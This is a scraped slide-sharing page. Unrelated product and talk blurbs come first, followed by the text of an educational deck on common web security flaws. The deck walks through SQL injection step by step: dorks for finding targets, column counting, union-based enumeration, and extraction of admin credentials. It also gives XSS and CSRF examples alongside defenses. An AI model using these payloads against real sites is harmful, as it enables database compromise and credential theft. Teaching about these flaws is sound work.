- Invited for poster presentation at PLDI SRC ‘16.
Software Engineering, Software Consulting, Tech Lead, Spring Boot, Spring Cloud, Spring Core, Spring JDBC, Spring Transaction, Spring MVC, OpenShift Cloud Platform, Kafka, REST, SOAP, LLD & HLD.
E-commerce Development Services- Hornet DynamicsHornet Dynamics
For any business hoping to succeed in the digital age, having a strong online presence is crucial. We offer Ecommerce Development Services that are customized according to your business requirements and client preferences, enabling you to create a dynamic, safe, and user-friendly online store.
When it is all about ERP solutions, companies typically meet their needs with common ERP solutions like SAP, Oracle, and Microsoft Dynamics. These big players have demonstrated that ERP systems can be either simple or highly comprehensive. This remains true today, but there are new factors to consider, including a promising new contender in the market that’s Odoo. This blog compares Odoo ERP with traditional ERP systems and explains why many companies now see Odoo ERP as the best choice.
What are ERP Systems?
An ERP, or Enterprise Resource Planning, system provides your company with valuable information to help you make better decisions and boost your ROI. You should choose an ERP system based on your company’s specific needs. For instance, if you run a manufacturing or retail business, you will need an ERP system that efficiently manages inventory. A consulting firm, on the other hand, would benefit from an ERP system that enhances daily operations. Similarly, eCommerce stores would select an ERP system tailored to their needs.
Because different businesses have different requirements, ERP system functionalities can vary. Among the various ERP systems available, Odoo ERP is considered one of the best in the ERp market with more than 12 million global users today.
Odoo is an open-source ERP system initially designed for small to medium-sized businesses but now suitable for a wide range of companies. Odoo offers a scalable and configurable point-of-sale management solution and allows you to create customised modules for specific industries. Odoo is gaining more popularity because it is built in a way that allows easy customisation, has a user-friendly interface, and is affordable. Here, you will cover the main differences and get to know why Odoo is gaining attention despite the many other ERP systems available in the market.
Measures in SQL (SIGMOD 2024, Santiago, Chile)Julian Hyde
SQL has attained widespread adoption, but Business Intelligence tools still use their own higher level languages based upon a multidimensional paradigm. Composable calculations are what is missing from SQL, and we propose a new kind of column, called a measure, that attaches a calculation to a table. Like regular tables, tables with measures are composable and closed when used in queries.
SQL-with-measures has the power, conciseness and reusability of multidimensional languages but retains SQL semantics. Measure invocations can be expanded in place to simple, clear SQL.
To define the evaluation semantics for measures, we introduce context-sensitive expressions (a way to evaluate multidimensional expressions that is consistent with existing SQL semantics), a concept called evaluation context, and several operations for setting and modifying the evaluation context.
A talk at SIGMOD, June 9–15, 2024, Santiago, Chile
Authors: Julian Hyde (Google) and John Fremlin (Google)
https://doi.org/10.1145/3626246.3653374
Mobile App Development Company In Noida | Drona InfotechDrona Infotech
Drona Infotech is a premier mobile app development company in Noida, providing cutting-edge solutions for businesses.
Visit Us For : https://www.dronainfotech.com/mobile-application-development/
Artificia Intellicence and XPath Extension FunctionsOctavian Nadolu
The purpose of this presentation is to provide an overview of how you can use AI from XSLT, XQuery, Schematron, or XML Refactoring operations, the potential benefits of using AI, and some of the challenges we face.
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeAftab Hussain
Understanding variable roles in code has been found to be helpful by students
in learning programming -- could variable roles help deep neural models in
performing coding tasks? We do an exploratory study.
- These are slides of the talk given at InteNSE'23: The 1st International Workshop on Interpretability and Robustness in Neural Software Engineering, co-located with the 45th International Conference on Software Engineering, ICSE 2023, Melbourne Australia
Do you want Software for your Business? Visit Deuglo
Deuglo has top Software Developers in India. They are experts in software development and help design and create custom Software solutions.
Deuglo follows seven steps methods for delivering their services to their customers. They called it the Software development life cycle process (SDLC).
Requirement — Collecting the Requirements is the first Phase in the SSLC process.
Feasibility Study — after completing the requirement process they move to the design phase.
Design — in this phase, they start designing the software.
Coding — when designing is completed, the developers start coding for the software.
Testing — in this phase when the coding of the software is done the testing team will start testing.
Installation — after completion of testing, the application opens to the live server and launches!
Maintenance — after completing the software development, customers start using the software.
UI5con 2024 - Bring Your Own Design SystemPeter Muessig
How do you combine the OpenUI5/SAPUI5 programming model with a design system that makes its controls available as Web Components? Since OpenUI5/SAPUI5 1.120, the framework supports the integration of any Web Components. This makes it possible, for example, to natively embed own Web Components of your design system which are created with Stencil. The integration embeds the Web Components in a way that they can be used naturally in XMLViews, like with standard UI5 controls, and can be bound with data binding. Learn how you can also make use of the Web Components base class in OpenUI5/SAPUI5 to also integrate your Web Components and get inspired by the solution to generate a custom UI5 library providing the Web Components control wrappers for the native ones.
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Crescat
Crescat is industry-trusted event management software, built by event professionals for event professionals. Founded in 2017, we have three key products tailored for the live event industry.
Crescat Event for concert promoters and event agencies. Crescat Venue for music venues, conference centers, wedding venues, concert halls and more. And Crescat Festival for festivals, conferences and complex events.
With a wide range of popular features such as event scheduling, shift management, volunteer and crew coordination, artist booking and much more, Crescat is designed for customisation and ease-of-use.
Over 125,000 events have been planned in Crescat and with hundreds of customers of all shapes and sizes, from boutique event agencies through to international concert promoters, Crescat is rigged for success. What's more, we highly value feedback from our users and we are constantly improving our software with updates, new features and improvements.
If you plan events, run a venue or produce festivals and you're looking for ways to make your life easier, then we have a solution for you. Try our software for free or schedule a no-obligation demo with one of our product specialists today at crescat.io
Energy consumption of Database Management - Florina Jonuzi
Widespread security flaws in web application development 2015
1. Widespread security flaws in web
application development
Martin Ahchiev
Content is available under a Creative Commons 3.0 License unless otherwise noted.
2. 2Widespread security flaws in web application development
FOCUS ON COMMON SECURITY
CHALLENGES
YOU ALREADY NEED TO KNOW
WEB PROGRAMMING
3. 3Widespread security flaws in web application development
FACT:
THE VAST
MAJORITY OF WEB
APPLICATION HAVE
SECURITY VULNERABILITIES!
MOST DEVELOPERS NOT AWARE OF THE ISSUES
5. 5Widespread security flaws in web application development
Attacker can access unauthorized data!
They use your website to attack your
users
We will cover many attacks later in this
demo
Most Sites Not Secure
6. 6Widespread security flaws in web application development
The WEB wasn’t designed to be secure!
Built for static, read-only pages
Almost no intrinsic security
A few security features were “bolted on”
later
Security and defensive development
style
HTTP History
7. 7Widespread security flaws in web application development
DATABASE
BROWSER
FIREWALL
WEB SERVER
WEB SERVICE
ACCESS CONTROLAUTH SERVICE
XSS
CSRF
PACKET
SNIFFING
FORGED
TOKEN DIRECT
OBJECT
REFERENCE
SQL
INJECTION
DIRECTORY
TRAVERSAL
XML
INJECTION
8. 8Widespread security flaws in web application development
OWASP - The Ten Most Critical Web
Application Security Risks
SANS Institute - CWE/SANS TOP 25 Most
Dangerous Software Errors
Organizations that contributed vulnerability
statistics
Aspect Security
MITRE
Softtek
White Hat
Ranking of Web Security Vulnerabilities
9. 9
In next 10 minutes…
Widespread security flaws in web application development
SQL Injection Explained
Hands-On Example
The Basic Fixes
More Resources
10. 10
OWASP Top 10 - 2013
Widespread security flaws in web application development
INJECTION ATTACKS ARE A SERIOUS PROBLEM
“SQL Injection is an old problem –
so I don’t have to worry about it “
11. 11
OWASP Top 10 - 2013
Widespread security flaws in web application development
13. 13
Typical Scenario
Widespread security flaws in web application development
Bob
WEB SERVER DATABASE
private void queryDB(String u_name) {
string sql = “SELECT * FROM users WHERE name = ‘ ” + u_name + “ ‘ ”;
doQuery(sql);
}
In Application Code
Bob
Bob
17. 17
SQL Injection Attack
Widespread security flaws in web application development
ob’ or ‘1’=‘1’
WEB SERVER DATABASE
private void queryDB(String u_name) {
string sql = “SELECT * FROM users WHERE name = ‘ ” + u_name + “ ‘ ”;
doQuery(sql);
}
In Application Code
Bob’ or ‘1’=‘1’
Bob’ or ‘1’=‘1’
18. 18
SQL Injection Attack
Widespread security flaws in web application development
DATABASE
SELECT * FROM users WHERE name = ‘Bob’ or ‘1’=‘1’
JUST RETURNS ROWS
FOR Bob OR WHENEVER
ONE EQUALS ONE
(ALL ROWS)
19. 19
Hands-On Example: Step 1
Widespread security flaws in web application development
HOW ATTACKERS SEARCH FOR TARGETS
DORKS
EXAMPLES:
1. "details.php?id=xxx"
2. "gallery.php?id="
3. inurl:"products.php?prodID="
20. 20
Hands-On Example: Step 2
Widespread security flaws in web application development
HOW ATTAKERS TEST TARGETS FOR
VULNERABILITIES
http://www.localhost:999/newsdetails.aspx?id=51
21. 21
Hands-On Example: Step 3
Widespread security flaws in web application development
HOW ATTACKERS TEST TARGETS FOR
VULNERABILITIES
Let’s add an single quote “ ‘ ”at the end of the URL
http://www.localhost:999/newsdetails.aspx?id=51‘
SQL Code:
SELECT * FROM NEWS WHERE id = 5 '
22. 22
Hands-On Example: Step 4
Widespread security flaws in web application development
Finding the number of columns
NoError/Error statements
"order by X--" where "X" is a random integer number
EXAMPLE:
http://www.localhost:999/newsdetail.php?id=51 order by 12--
23. 23
Hands-On Example: Step 4
Widespread security flaws in web application development
How about we go down a bit to "order by 5--"
http://www.localhost:999/newsdetail.php?id=51 order by 5--
http://www.localhost:999/newsdetail.php?id=51 order by 4--
24. 24
Hands-On Example: Step 5
Widespread security flaws in web application development
How attackers find Vulnerable Columns
UNION SELECT command
EXAMPLE:
SELECT * FROM users UNION SELECT * FROM admin
http://www.localhost:999/newsdetail.php?id=51+union+select+1,2,3
25. 25
Hands-On Example: Step 5
Widespread security flaws in web application development
How attackers find Vulnerable Columns
INVALIDATE THE FIRST QUERY
EXAMPLES:
http://www.localhost:999/newsdetail.php?id=51+union+select+1,2,3
1. http://www.localhost:999/newsdetail.php?id=51+and+0+union+select+1,2,3
2. http://www.localhost:999/newsdetail.php?id=51+and+false+union+select+
1,2,3
3. http://www.localhost:999/newsdetail.php?id=-51+union+select+1,2,3
4. http://www.localhost:999/newsdetail.php?id=null+union+select+1,2,3
5. http://www.localhost:999/newsdetail.php?id=51+&&+0+union+select+1,2,3
26. 26
Hands-On Example: Step 5
Widespread security flaws in web application development
How attackers find Vulnerable Columns
EXAMPLES:
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,2,3
27. 27
Hands-On Example: Step 6
Widespread security flaws in web application development
Obtaining the SQL Version
@@version
http://www.localhost:999/newsdetail.php?id=-
51+union+select+1,@@version,3
convert(@@version using latin1)
http://www.localhost:999/newsdetail.php?id=-
51+union+select+1,convert(@@version using latin1),3
unhex(hex(@@version))
http://www.localhost:999/newsdetail.php?id=-
51+union+select+1,unhex(hex(@@version)),3
28. 28
Hands-On Example: Step 6
Widespread security flaws in web application development
Obtaining the SQL Version
database() - find the current database
user() - find the user information
@@hostname - current hosting info
@@datadir - directory of the data of the website
29. 29
Hands-On Example: Step 7
Widespread security flaws in web application development
Obtaining the Table Names
information_schema.tables
http://www.localhost:999/newsdetail.php?id=-
51+union+select+1,table_name,3+from+information_schema.tab
group_concat()
http://www.localhost:999/newsdetail.php?id=-
51+union+select+1,group_concat(table_name),3 from
information_schema.tables
30. 30
Hands-On Example: Step 8
Widespread security flaws in web application development
Obtaining the Column Names form
Table Names
informaiton_schema.columns instead of
informtion_schema.tables
column_name instead of table_name
+from+information_schema.columns where
table_name=TableNameHEX - tblAdmin
http://www.localhost:999/newsdetail.php?id=-
51+union+select+1,group_concat(column_name),3 from
information_schema.columns where table_name=0x74626c61646d696e--
31. 31
Hands-On Example: Step 9
Widespread security flaws in web application development
Getting Data from Columns
concat() function
Separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
http://www.md5decrypter.co.uk
http://www.localhost:999/newsdetail.php?id=-51
+union+select+1,concat(username,0x3a,password),3+from+tblAd
min
32. 32
SQL Injection
Widespread security flaws in web application development
SQL INJECTION = HUGE RISK
CAN COMPROMISE ALL YOUR DATA
SINGLE INJECTION FLAW CAN LEAD
TO COMPLETE SERVER TAKEOVER!
33. 33
Defense Against SQL Injection
Widespread security flaws in web application development
HOW CAN WE DEFEND OURSELVES?
Prepared Statements
Stored Procedures
Escaping All User Supplied Input
Least Privilege
White List Input Validation
34. 34
Parameterized Queries
Widespread security flaws in web application development
Prepared Statements
String custname = request.getParameter("customerName");
// This should REALLY be validated
String query = "SELECT account_balance FROM
user_data WHERE user_name = ? ";
PreparedStatement pstmt =
connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( );
Data from user
35. 35
Parameterized Queries
Widespread security flaws in web application development
Stored Procedures
String custname = request.getParameter("customerName");
// This should REALLY be validated
try {
CallableStatement cs =
connection.prepareCall("{call sp_getAccountBalance(?)}");
cs.setString(1, custname);
ResultSet results = cs.executeQuery();
// … result set handling
} catch (SQLException se) { // … logging and error handling }
36. 36
SQL Injection Prevention
Widespread security flaws in web application development
Least Privilege - Always minimize database
privileges to reduce the impact of a flaw
White List Input Validation
"(555)123-1234",
"555.123.1234", and
"555";DROP TABLE USER;--123.1234“
all convert to 5551231234
37. 37
SQL Injection Prevention
Widespread security flaws in web application development
NOW YOU KNOW THE BASICS
BUT YOU NEED TO KNOW MOREPrepared
Statements
Stored
Procedure
Escaping
38. 38
Cross - Site Scripting (XSS)
Widespread security flaws in web application development
XSS Explained
Three Examples of XSS
The Basic Fixes
More Resources
39. 39
OWASP Top 10 - 2013
Widespread security flaws in web application development
40. 40
EXAMPLE #1
Widespread security flaws in web application development
TARGET OF XSS
A BRIEF COMPARISON
OF SQL INJECTION
AND XSS
THE TARGET OF SQL INJECTION IS
THE DATABASE SERVER
THE TARGET OF XSS ARE
OTHER USERS
41. 41Widespread security flaws in web application development
GOAL: DISTRIBUTES MALICIOUS SCRIPTS
XSS DEFINED:
XSS IS SCRIPT INJECTION
45. 45
EXAMPLE #2
Widespread security flaws in web application development
XSS IN MORE DETAIL…
<HTML>
<BODY>
<H1>Upload Video</H1>
<H2>Description</H2>
</BODY>
</HTML>
Static Content
User Supplied
Content
Video Training Description
49. 49
EXAMPLE #2
Widespread security flaws in web application development
VideoTutorialsSite
Video Training Description
<script>/*Evil code*/</script>
50. 50
EXAMPLE #2
Widespread security flaws in web application development
XSS IN MORE DETAIL…
<HTML>
<BODY>
<H1>Upload Video</H1>
<H2>Description</H2>
</BODY>
</HTML>
Static Content
User Supplied
Content
Video Training Description
<script>/*Evil code*/</script>
52. 52
EXAMPLE #2
Widespread security flaws in web application development
Video Training Description
<script>/*Evil code*/</script>
Attackers Can Use
JavaScript to ….
Steal your session ID
Rewrite any part of the
HTML page
Overlay the Login
Screen with their own,
to steal the username
and password
55. 55
EXAMPLE #3
Widespread security flaws in web application development
RESULTING CODE SNIPPET
Enter your name:
<input type=“text” id=“uname”
value=“”
/>
GUEST BOOK
Alice
“Alice”
56. 56Widespread security flaws in web application development
NOW CONSIDER THIS INPUT
Alice” onmouseover=“/*evil_action*/
EXAMPLE #3
57. 57
EXAMPLE #3
Widespread security flaws in web application development
RESULTING CODE SNIPPET
Enter your name:
<input type=“text” id=“uname”
value=“”
/>
GUEST BOOK
Alice” onmouseover=“/*evil*/
“Alice” onmouseover=“/*evil*/“
59. 59
XSS Fixes
Widespread security flaws in web application development
Developers fails to properly validate and
encode the input data
XSS can only be prevented by secure
coding practices
Encoding must be contextual!
60. 60
XSS Fixes
Widespread security flaws in web application development
PARTIAL LISTING
OF CONTEXTS
EACH CONTEXT
MUST BE ENCODED
DIFFERENTLY
<HTML>
<HEAD>
</HEAD>
</HTML>
<STYLE>
Property: …
</STYLE>
<SCRIPT>
alert(‘…’)
</SCRIPT>
<BODY>
…
</BODY>
<img src=“…”/>
<div attr=“…”></div>
63. 63
CSRF
Widespread security flaws in web application development
sea surf
one-click attack
session riding
Cross Site Request Forgery abbreviated as
CSRF and XSRF is also known as:
64. 64
OWASP Top 10 - 2013
Widespread security flaws in web application development
65. 65Widespread security flaws in web application development
Typical CSRF Scenario
e-Banking
Attacker’s website
Auth
Request
Site loaded
Malicious
link
Malicious
Request embedded
Authenticated request
66. 66Widespread security flaws in web application development
CSRF Attack in more detail..
e-Banking
Authenticated request to transfer money online
Mr. Victim
HTTP POST https://mybank.com/transfer
Auth-cookie: 5234d574s4
TargetAccountNumber: 53645634635785
Amount:2000.00
Attacker forges request
67. 67
CSRF Prevention
Widespread security flaws in web application development
Validating a secret token
Include a secret token with each request and to validate
that the received token is correctly bound to the user's
session.
Validating the HTTP Referer header
Accept requests only from trusted sources by verifying
the referer header.
75. 75Widespread security flaws in web application development
Example #1
Corporate eMail
List of e-mails
Session Cookie
List of e-mails
Session Cookie
Session Hijacking
76. 76Widespread security flaws in web application development
Using HTTPS, the attacker could see the
password
But they were able to steal the session cookie
and see all transmitted data
Solution: Move entire site to HTTPS
HTTPS ensures authenticity, and prevents
spaying
HTTPS
There Are Still Several Risks…
78. 78Widespread security flaws in web application development
Example #2
Corporate eMail
Credentials
http://www.corp-email.com
302
redirect
https://www.corp-email.com
Credentials
The unsecured HTTP Request is vulnerable to attack
79. 79Widespread security flaws in web application development
Example #2
Corporate eMail
Man-In-The-Middle Attack
80. 80Widespread security flaws in web application development
Example #2
SOLUTION:
STRICT TRANSPORT SECURITY
HTTP HEADER
81. 81Widespread security flaws in web application development
HSTS
The header is sent over secure connection
HSTS converts HTTP links to HTTPS in browser
Conversion happens entirely in the browser
The security flag also prevents accepting untrusted
connections
84. 84Widespread security flaws in web application development
HSTS
The HSTS is language independent
Only requires to put the header in any
response
The HSTS flag will ONLY be honored if sent
over HTTPS!
87. 87Widespread security flaws in web application development
This demo is only
a starting point…
Conclusions &
Recommendations
88. 88Widespread security flaws in web application development
Content is available under a Creative Commons 3.0 License unless otherwise noted.
martin@ahchiev.com
Editor's Notes
Класации
Туториали
Безплатни Фреймлъркова за разработка на сигурни приложения